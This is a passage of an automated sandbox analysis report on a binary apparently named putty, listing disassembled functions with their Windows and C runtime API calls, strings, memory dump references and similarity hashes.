__CxxThrowException@8.LIBCMT ref: 003224A7
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000020,00000000), ref: 003224E1

Strings

Cannot close previously open file handle., xrefs: 0032248F
Error opening file "%s": , xrefs: 003224F9

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: CloseCreateException@8FileHandleThrow
String ID: Cannot close previously open file handle.$Error opening file "%s":
API String ID: 2660559532-469424904
Opcode ID: 4069f60d271445fb6b9a49b6e6f2a376dfe2081f69c738d99d82a8e94ee3900e
Instruction ID: c58d5d37a78d4ea30ac4d445ccc3f1ed53135fe36b2446799bc60bcc725f5cf3
Opcode Fuzzy Hash: 4069f60d271445fb6b9a49b6e6f2a376dfe2081f69c738d99d82a8e94ee3900e
Instruction Fuzzy Hash: FF218370650710BBD631EF29EC46F5673E8BB44710F210B2AF6A1EB5D0D670B944CB95

Function 00350B40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 00350B6D
_memmove.LIBCMT ref: 00350B9F

Strings

Insufficient memory to process iCCP chunk, xrefs: 00350B87
Insufficient memory to process iCCP profile, xrefs: 00350BBF

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: _memmovelstrlen
String ID: Insufficient memory to process iCCP chunk$Insufficient memory to process iCCP profile
API String ID: 3428047308-3653750934
Opcode ID: 7888666d787c0ee351fd813f6aba4ce25db40ea6748f47a3ff76fae755e82451
Instruction ID: 5434f1f1c242bd3012e4eff3b014fb749a36ec589422790cee79a4133f990c59
Opcode Fuzzy Hash: 7888666d787c0ee351fd813f6aba4ce25db40ea6748f47a3ff76fae755e82451
Instruction Fuzzy Hash: 99218031A00609ABDB1AEF68D891BEBBBE8EB44300F044659FD099F341DB71AD5487E1

Function 00327EB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,00000021,00000000,00000000), ref: 00327F0C
AreFileApisANSI.KERNEL32(00000000,?,00000001,?,?,00000021,00000000,00000000), ref: 00327F17
WideCharToMultiByte.KERNEL32(00000001,?,00000001,?,?,00000021,00000000,00000000), ref: 00327F23

Strings

, xrefs: 00327EDC
, xrefs: 00327EE3

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: ApisByteCharFileMultiWidelstrlen
String ID: $
API String ID: 3772505333-3032137957
Opcode ID: 3fa7be944eebf009f729577436cee0b07521221e7755ac77ef087b808e3fc4f2
Instruction ID: e8dd5d682e21fb76d8ababae32d082c09898553949200e271f7d6dcfcad3c429
Opcode Fuzzy Hash: 3fa7be944eebf009f729577436cee0b07521221e7755ac77ef087b808e3fc4f2
Instruction Fuzzy Hash: 9C118B709012089FDB55DFB8E8C9BAA7BB9FF48300F0045AAED05DF285E7719944CB90

Function 003BBB21 Relevance: 7.7, APIs: 5, Instructions: 160COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 003BBB7C
_memcpy_s.LIBCMT ref: 003BBBED
__read.LIBCMT ref: 003BBC50
__filbuf.LIBCMT ref: 003BBC6C

Part of subcall function 003BC06C: __getptd_noexit.LIBCMT ref: 003BC06C

_memset.LIBCMT ref: 003BBCAD

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
String ID:
API String ID: 4048096073-0
Opcode ID: 16bda8328622da434948c58df7e8c74e585240bdc733ca48516523a80db879bf
Instruction ID: a780b05c6da34fad22d8a740e8edcc65b2ef320e2d9f9a20e4a5a2cb02f4c9c1
Opcode Fuzzy Hash: 16bda8328622da434948c58df7e8c74e585240bdc733ca48516523a80db879bf
Instruction Fuzzy Hash: B451FA30A00308DFCB26DFA9C8846DDFBB9AF40328F254629E66557994DFB09E40DB51

Function 003C13BF Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 003C13CD

Part of subcall function 003B9B62: __FF_MSGBANNER.LIBCMT ref: 003B9B7B
Part of subcall function 003B9B62: __NMSG_WRITE.LIBCMT ref: 003B9B82
Part of subcall function 003B9B62: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,003BE372,00000000,00000001,00000000,?,003CA150,00000018,00402B88,0000000C,003CA1E0), ref: 003B9BA7

_free.LIBCMT ref: 003C13E0

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: f7e456c54079924779e297d9b9604f343d74105c8c8b2afb3467235474421d12
Instruction ID: a8d38cb81588088c442ca1c3381fcb15ee21e91f18d651ceb08fbb0ed2a3bc1a
Opcode Fuzzy Hash: f7e456c54079924779e297d9b9604f343d74105c8c8b2afb3467235474421d12
Instruction Fuzzy Hash: CE11B232900211EACB373F65A805F9A37A8AF42365F62442AFA89DA952DE31CC40A754

Function 00326740 Relevance: 7.6, APIs: 5, Instructions: 60synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00326755
ReleaseMutex.KERNEL32(?), ref: 0032676A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0032677A
ReleaseMutex.KERNEL32(?), ref: 00326792
TerminateProcess.KERNEL32(?,00000000), ref: 003267A2

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: MutexObjectReleaseSingleWait$ProcessTerminate
String ID:
API String ID: 2632252251-0
Opcode ID: bc2fda0133a776b13e66a6bd1ca118d7cfb8d0e5a5ed4ceb3d065ec25294d1ac
Instruction ID: 47d908d595d281f3cd5d6a393c94b183686a572c98920fa74e6ceed94af38447
Opcode Fuzzy Hash: bc2fda0133a776b13e66a6bd1ca118d7cfb8d0e5a5ed4ceb3d065ec25294d1ac
Instruction Fuzzy Hash: BE0196362053156B9B20DFBAFC81E66B3ECEF45724B140A5DE545C72A0CA71E8008750

Function 00328FB0 Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00328FDF

Part of subcall function 003B7DD6: _setlocale.LIBCMT ref: 003B7DE8

_free.LIBCMT ref: 00328FF1

Part of subcall function 003B93AA: HeapFree.KERNEL32(00000000,00000000,?,003B9472,?), ref: 003B93C0
Part of subcall function 003B93AA: GetLastError.KERNEL32(?,?,003B9472,?), ref: 003B93D2

_free.LIBCMT ref: 00329004
_free.LIBCMT ref: 00329017
_free.LIBCMT ref: 0032902A

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
String ID:
API String ID: 3515823920-0
Opcode ID: b5351f58c961f0be2ba4dbb5db5688bec1d83012cda3caf17059fd369b0f3685
Instruction ID: fec00a7956d25b6d77b914b12e52c9b4753f12ae2bd4aedc9ed30545affff7ac
Opcode Fuzzy Hash: b5351f58c961f0be2ba4dbb5db5688bec1d83012cda3caf17059fd369b0f3685
Instruction Fuzzy Hash: 1B11C1B2A006049BD721DF59D801A8BF7EAEF54720F158A2BF516C7B80E632FD048B91

Function 003C7829 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 003C7835

Part of subcall function 003C0CCC: __getptd_noexit.LIBCMT ref: 003C0CCF
Part of subcall function 003C0CCC: __amsg_exit.LIBCMT ref: 003C0CDC

__getptd.LIBCMT ref: 003C784C
__amsg_exit.LIBCMT ref: 003C785A
__lock.LIBCMT ref: 003C786A
__updatetlocinfoEx_nolock.LIBCMT ref: 003C787E

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 42edc77b6416c183e11ad6762824982d983a591a54d60f0841937c6bcabfca5e
Instruction ID: 030f41709e02d213700ae2e12f20bf41c1320b7648079fe462286943f2108816
Opcode Fuzzy Hash: 42edc77b6416c183e11ad6762824982d983a591a54d60f0841937c6bcabfca5e
Instruction Fuzzy Hash: 01F09032A08704DADB63BBA9980BF1932A0AF00720F21921DF904EE6D2CB745D00DF5A

Function 00337BB0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 186COMMON

Download Yara Rule

APIs

swprintf.LIBCMT ref: 00337D7E

Strings

%, xrefs: 00337D04
+, xrefs: 00337D12
$, xrefs: 00337C0E

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: swprintf
String ID: $$%$+
API String ID: 233258989-3202472541
Opcode ID: bcafba7b07a8908566d431f49b3f8e2b0c56e0ba47f3c99e3f62ddeb1e604b8d
Instruction ID: 56c552fd96ec1698aacfcd8273d5f446f92f571b090fd2eb4f715e34c5a5fa7b
Opcode Fuzzy Hash: bcafba7b07a8908566d431f49b3f8e2b0c56e0ba47f3c99e3f62ddeb1e604b8d
Instruction Fuzzy Hash: E3514DF2A0C3009BD7379E08C4C47AB7BE9AF45740F216A49F885972A5E7358C458BC6

Function 003D472D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 003D47BD

Part of subcall function 003D5DA0: __87except.LIBCMT ref: 003D5DDB

Strings

pow, xrefs: 003D4795, 003D47B2

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: fc67d1f08ebf26a98ed9607f384df463c7358eef98fcf9a45e3c98cc482431e3
Instruction ID: d6d9503f954466166c7a5c37042d2d16516717a07ad1ae05cb9f970d97287687
Opcode Fuzzy Hash: fc67d1f08ebf26a98ed9607f384df463c7358eef98fcf9a45e3c98cc482431e3
Instruction Fuzzy Hash: 42517C73908A02C7DB137714F9013BA2BD8AB51740F218D6BF0E5863E8EF358D949A46

Function 00323DB0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

Part of subcall function 00321780: std::_Xinvalid_argument.LIBCPMT ref: 0032179A

Part of subcall function 003B964E: _malloc.LIBCMT ref: 003B9668

std::exception::exception.LIBCMT ref: 00323E4D
__CxxThrowException@8.LIBCMT ref: 00323E62
FindClose.KERNEL32(?,D747BB9A,00000000,?,?,\-@), ref: 00323EB5

Strings

\-@, xrefs: 00323E57, 00323E5A

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: CloseException@8FindThrowXinvalid_argument_mallocstd::_std::exception::exception
String ID: \-@
API String ID: 1082621173-3423671737
Opcode ID: f4549b8dfd053dc7c343ae35a614f18654004e8f28c2704e5912770540ac865f
Instruction ID: 9a292ebff33001bd6100d70ca65aa947f3c909f93cddc7ab00d6cf825bb08f3f
Opcode Fuzzy Hash: f4549b8dfd053dc7c343ae35a614f18654004e8f28c2704e5912770540ac865f
Instruction Fuzzy Hash: 9361BFB29002549FC722CF68E840B9ABBF4FF48314F16465EE8599B741D774EE08CB91

Function 00337DD0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 180COMMON

Download Yara Rule

APIs

swprintf.LIBCMT ref: 00337F8C

Strings

+, xrefs: 00337F20
%, xrefs: 00337F12
$, xrefs: 00337E2E

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: swprintf
String ID: $$%$+
API String ID: 233258989-3202472541
Opcode ID: 33ffb3ca955d139d1088f6b967758f28bb4edd2d28abc181f589a31bbc648c43
Instruction ID: 9124f89b77e0b93e746b7c1d4862afd134424ec8510a5991f23a06bea591eb33
Opcode Fuzzy Hash: 33ffb3ca955d139d1088f6b967758f28bb4edd2d28abc181f589a31bbc648c43
Instruction Fuzzy Hash: 6F516BF2A0C3009AD7379E08C8C479BBBE9BB85340F215A89F98597791E3358D548BC2

Function 00332950 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 00332A70
ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,D747BB9A,003FE778,003FFF84,0033E960,0033E960,00000000,003DBC6C,000000FF), ref: 00332AB7
__CxxThrowException@8.LIBCMT ref: 00332B25

Part of subcall function 003B9164: RaiseException.KERNEL32(Z 2,?,D747BB9A,003DD6C4,0032205A,?,00402D5C,?,D747BB9A), ref: 003B91A6

Strings

Unable to read the file "%s"., xrefs: 00332AF4

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Exception@8Throw$ExceptionFileRaiseRead
String ID: Unable to read the file "%s".
API String ID: 4246573233-2779281292
Opcode ID: 895251559f466ce7798037b3086897aafe5bd6d4113d35a0629320e980b2ae8b
Instruction ID: da7b362270d85fe0345074030546a3be0ccae7053d8a6e6634742825456f265e
Opcode Fuzzy Hash: 895251559f466ce7798037b3086897aafe5bd6d4113d35a0629320e980b2ae8b
Instruction Fuzzy Hash: 4C51B2715083419FC326DF68D885BABB3E8FF88704F004E1EF59A97290EB70A944CB56

Function 003394A0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 151COMMON

Download Yara Rule

APIs

_localeconv.LIBCMT ref: 003394CE

Part of subcall function 003BB17D: __getptd.LIBCMT ref: 003BB17D

Part of subcall function 003B7AB5: ____lc_handle_func.LIBCMT ref: 003B7AB8
Part of subcall function 003B7AB5: ____lc_codepage_func.LIBCMT ref: 003B7AC0

Strings

false, xrefs: 00339520
true, xrefs: 0033953C
,, xrefs: 00339624

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
